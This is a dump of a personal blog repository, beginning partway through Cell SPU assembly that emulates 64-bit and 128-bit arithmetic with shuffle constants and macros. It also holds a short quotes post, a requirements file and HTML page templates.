 41 |     .byte  0x0B, 0x0A, 0x09, 0x08, 0x0F, 0x0E, 0x0D, 0x0C
 42 |     // swap-endian-64: byte indices reversed within each 64-bit doubleword (loaded into alu_reg_se64)
 43 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 44 |     .byte  0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
 45 |     // swap-endian-128: byte indices reversed across the whole 128-bit quadword (loaded into alu_reg_se128)
 46 |     .byte  0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
 47 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 48 | 
 49 |     .align 4
 50 |     .global alu_wswap
 51 | alu_wswap:
 52 |     // mul_lhs: switch endian, then word swap [0,1,2,3] -> [0,1,1,0] (only source bytes 0x00-0x07 are referenced)
 53 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 54 |     .byte  0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
 55 |     // mul_rhs: switch endian, then word swap [0,1,2,3] -> [0,1,0,1] (only source bytes 0x00-0x07 are referenced)
 56 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 57 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 58 | 
 59 |     .align 4
 60 |     .global alu_mul64_constants
 61 | alu_mul64_constants:
 62 |     // v0: output words = [zero, word 0, word 2, word 1] of the source (control byte 0x80 yields a zero byte)
 63 |     .byte  0x80, 0x80, 0x80, 0x80, 0x00, 0x01, 0x02, 0x03
 64 |     .byte  0x08, 0x09, 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07
 65 |     // v1: output words = [word 0, word 2, word 1, zero] of the source
 66 |     .byte  0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0A, 0x0B
 67 |     .byte  0x04, 0x05, 0x06, 0x07, 0x80, 0x80, 0x80, 0x80
 68 |     // v2: output words = [zero, word 3 of the second source (indices 0x1C-0x1F), word 3 of the first source, zero]
 69 |     .byte  0x80, 0x80, 0x80, 0x80, 0x1C, 0x1D, 0x1E, 0x1F
 70 |     .byte  0x0C, 0x0D, 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80
 71 |     // v3+v4: source words 0, 2, 1 placed at byte offset 2, with two zero bytes on each side
 72 |     .byte  0x80, 0x80, 0x00, 0x01, 0x02, 0x03, 0x08, 0x09
 73 |     .byte  0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07, 0x80, 0x80
 74 |     // v5+v6: source word 3 placed at byte offset 6, with six zero bytes on each side
 75 |     .byte  0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x0C, 0x0D
 76 |     .byte  0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80
 77 | // AND mask used by add_64 (loaded into alu_reg_add_m64): words 0 and 2 are all ones, words 1 and 3 are zero.
 78 |     .align 4
 79 |     .global alu_add64_constants
 80 | alu_add64_constants:
 81 |     .byte  0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
 82 |     .byte  0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
 83 | 
 84 | // Macros
 85 | // add_64(ret, lhs, rhs): two 64-bit adds per register. Byte-reverses each doubleword (alu_reg_se64), adds word-wise, adds each low-word carry into its high word (alu_reg_add_m64 drops carries that would cross a doubleword), then byte-reverses back. Clobbers alu_reg_t0-t2.
 86 | #define add_64(ret, lhs, rhs)                                                \
 87 |     shufb   alu_reg_t0, lhs, lhs, alu_reg_se64                              ;\
 88 |     shufb   alu_reg_t1, rhs, rhs, alu_reg_se64                              ;\
 89 |     cg      alu_reg_t2, alu_reg_t0, alu_reg_t1                              ;\
 90 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t1                              ;\
 91 |     shlqbyi alu_reg_t2, alu_reg_t2, 4                                       ;\
 92 |     and     alu_reg_t2, alu_reg_t2, alu_reg_add_m64                         ;\
 93 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t2                              ;\
 94 |     shufb          ret, alu_reg_t0, alu_reg_t0, alu_reg_se64                ;
 95 | // add_128(ret, lhs, rhs): 128-bit add built from word adds. Adds word-wise, then moves carries one word toward the most significant word three times (cg, shlqbyi by 4 bytes, a). No byte swap is performed here. Clobbers alu_reg_t0-t2.
 96 | #define add_128(ret, lhs, rhs)                                               \
 97 |     cg      alu_reg_t1, lhs, rhs                                            ;\
 98 |     a       alu_reg_t0, lhs, rhs                                            ;\
 99 |     shlqbyi alu_reg_t1, alu_reg_t1, 4                                       ;\
100 |     cg      alu_reg_t2, alu_reg_t0, alu_reg_t1                              ;\
101 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t1                              ;\
102 |     shlqbyi alu_reg_t2, alu_reg_t2, 4                                       ;\
103 |     cg      alu_reg_t1, alu_reg_t0, alu_reg_t2                              ;\
104 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t2                              ;\
105 |     shlqbyi alu_reg_t1, alu_reg_t1, 4                                       ;\
106 |     a              ret, alu_reg_t0, alu_reg_t1                              ;
107 | // mul_64(ret, lhs, rhs): shuffles the operands (alu_reg_mul_lhs / alu_reg_mul_rhs), forms 16x16-bit partial products with mpyu / mpyhhu, realigns them into v0-v6 with shufb, sums them with add_128 and applies alu_reg_se64 to the sum. Clobbers alu_reg_i0-i1, t0-t3, v0-v6.
108 | #define mul_64(ret, lhs, rhs)                                                \
109 |     shufb   alu_reg_i0, lhs, lhs, alu_reg_mul_lhs                           ;\
110 |     shufb   alu_reg_i1, rhs, rhs, alu_reg_mul_rhs                           ;\
111 |     shli    alu_reg_v0, alu_reg_i0, 16                                      ;\
112 |     shli    alu_reg_v1, alu_reg_i1, 16                                      ;\
113 |     mpyu    alu_reg_t0, alu_reg_i0, alu_reg_i1                              ;\
114 |     mpyhhu  alu_reg_t1, alu_reg_i0, alu_reg_v1                              ;\
115 |     mpyhhu  alu_reg_t2, alu_reg_i1, alu_reg_v0                              ;\
116 |     mpyhhu  alu_reg_t3, alu_reg_i0, alu_reg_i1                              ;\
117 |     shufb   alu_reg_v0, alu_reg_t0, alu_reg_t0, alu_reg_mul_m0              ;\
118 |     shufb   alu_reg_v1, alu_reg_t3, alu_reg_t3, alu_reg_mul_m1              ;\
119 |     shufb   alu_reg_v2, alu_reg_t0, alu_reg_t3, alu_reg_mul_m2              ;\
120 |     shufb   alu_reg_v3, alu_reg_t1, alu_reg_t1, alu_reg_mul_m3              ;\
121 |     shufb   alu_reg_v4, alu_reg_t2, alu_reg_t2, alu_reg_mul_m3              ;\
122 |     shufb   alu_reg_v5, alu_reg_t1, alu_reg_t1, alu_reg_mul_m4              ;\
123 |     shufb   alu_reg_v6, alu_reg_t2, alu_reg_t2, alu_reg_mul_m4              ;\
124 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v1)                             ;\
125 |     add_128(alu_reg_v2, alu_reg_v2, alu_reg_v3)                             ;\
126 |     add_128(alu_reg_v4, alu_reg_v4, alu_reg_v5)                             ;\
127 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v2)                             ;\
128 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v4)                             ;\
129 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v6)                             ;\
130 |     shufb          ret, alu_reg_v0, alu_reg_v0, alu_reg_se64                ;
131 | 
132 | // Functions
133 | // alu_constants_init: loads each 16-byte constant from alu_endian, alu_wswap, alu_mul64_constants and alu_add64_constants into its alu_reg_* register, using alu_reg_t0 to hold the table address, then returns through $lr.
134 |     .global alu_constants_init
135 |     .type   alu_constants_init, @function
136 | alu_constants_init:
137 |     ila   alu_reg_t0, alu_endian
138 |     lqd   alu_reg_se32,    0x00(alu_reg_t0)
139 |     lqd   alu_reg_se64,    0x10(alu_reg_t0)
140 |     lqd   alu_reg_se128,   0x20(alu_reg_t0)
141 |     ila   alu_reg_t0, alu_wswap
142 |     lqd   alu_reg_mul_lhs, 0x00(alu_reg_t0)
143 |     lqd   alu_reg_mul_rhs, 0x10(alu_reg_t0)
144 |     ila   alu_reg_t0, alu_mul64_constants
145 |     lqd   alu_reg_mul_m0,  0x00(alu_reg_t0)
146 |     lqd   alu_reg_mul_m1,  0x10(alu_reg_t0)
147 |     lqd   alu_reg_mul_m2,  0x20(alu_reg_t0)
148 |     lqd   alu_reg_mul_m3,  0x30(alu_reg_t0)
149 |     lqd   alu_reg_mul_m4,  0x40(alu_reg_t0)
150 |     ila   alu_reg_t0, alu_add64_constants
151 |     lqd   alu_reg_add_m64, 0x00(alu_reg_t0)
152 |     bi    $lr
153 | 


--------------------------------------------------------------------------------
/posts/2024-04-28-quotes/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: live
 3 | date: 2024-04-28
 4 | title: Quotes
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | "Wir müssen wissen. Wir werden wissen." — David Hilbert
 9 |  
10 | "Everyone who confuses correlation with causation eventually ends up dead." — Alan Cooper
11 |  
12 | "I like offending people, because I think the people who get offended should be offended." — Linus Torvalds
13 |   
14 | "The less confident you are, the more serious you have to act." — Tara Ploughman
15 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | markdown==3.3.3
2 | pygments==2.15.0
3 | 


--------------------------------------------------------------------------------
/templates/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta charset="utf-8">
 5 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 6 |         <title>Blog</title>
 7 |         <!-- Style -->
 8 |         <link rel="stylesheet" href="css/code.css">
 9 |         <link rel="stylesheet" href="css/markdown.css">
10 |         <style>
11 |             body {
12 |                 box-sizing: border-box;
13 |                 min-width: 200px;
14 |                 max-width: 980px;
15 |                 margin: 0 auto;
16 |                 padding: 45px;
17 |             }
18 | 
19 |             header {
20 |                 position: relative;
21 |             }
22 |             header > .links {
23 |                 position: absolute;
24 |                 right: 0;
25 |             }
26 | 
27 |             footer {
28 |                 text-align: center;
29 |             }
30 |         
31 |             @media (max-width: 767px) {
32 |                 body {
33 |                     padding: 15px;
34 |                 }
35 |             }
36 |         </style>
37 |     </head>
38 |     <body class="markdown-body">
39 |         <header>
40 |             <div class="links">
41 |                 <span>
42 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
42 |                     <a href="https://github.com/AlexAltea">GitHub</a> |
44 |                     <a href="mailto:alexandro@phi.nz">Email</a>
45 |                 </span>
46 |             </div>
47 |             <h1>Blog</h1>
48 |         </header>
49 |         <article>
50 |             $posts
51 |         </article>
52 |         <hr>
53 |         <footer>
54 |             <p>
55 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
56 |             </p>
57 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
58 |         </footer>
59 |     </body>
60 | </html>
61 | 


--------------------------------------------------------------------------------
/templates/post.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta charset="utf-8">
 5 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 6 |         <title>$title</title>
 7 |         <!-- Style -->
 8 |         <link rel="stylesheet" href="../../css/code.css">
 9 |         <link rel="stylesheet" href="../../css/markdown.css">
10 |         <style>
11 |             body {
12 |                 box-sizing: border-box;
13 |                 min-width: 200px;
14 |                 max-width: 980px;
15 |                 margin: 0 auto;
16 |                 padding: 45px;
17 |             }
18 | 
19 |             header {
20 |                 position: relative;
21 |             }
22 |             header > .links {
23 |                 position: absolute;
24 |                 right: 0;
25 |             }
26 | 
27 |             .post-key {
28 |                 background-color: hsl(45, 67%, 80%);
29 |                 border-radius: 5px 0px 0px 5px;
30 |                 padding: 2px 6px 2px 8px;
31 |                 margin: 0px;
32 |             }
33 |             .post-val {
34 |                 background-color: hsl(45, 67%, 90%);
35 |                 border-radius: 0px 5px 5px 0px;
36 |                 padding: 2px 8px 2px 6px;
37 |                 margin: 0px;
38 |             }
39 | 
40 |             footer {
41 |                 text-align: center;
42 |             }
43 |         
44 |             @media (max-width: 767px) {
45 |                 body {
46 |                     padding: 15px;
47 |                 }
48 |             }
49 |         </style>
50 |     </head>
51 |     <body class="markdown-body">
52 |         <header>
53 |             <div class="links">
54 |                 <span>
55 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
56 |                     <a href="https://github.com/AlexAltea">GitHub</a> |
57 |                     <a href="mailto:alexandro@phi.nz">Email</a>
58 |                 </span>
59 |             </div>
60 |             <span><a href="../../">&lt; Other articles</a></span>
61 |         </header>
62 |         <article>
63 |             <h1>$title</h1>
64 |             <p>
65 |                 <span 
66 |                     class="post-key">Author</span><span
67 |                     class="post-val">$author</span>
68 |                 <span
69 |                     class="post-key">Date</span><span
70 |                     class="post-val">$date</span>
71 |             </p>
72 |             $content
73 |         </article>
74 |         <hr>
75 |         <footer>
76 |             <p>
77 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
78 |             </p>
79 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
80 |         </footer>
81 |     </body>
82 | </html>
83 | 


--------------------------------------------------------------------------------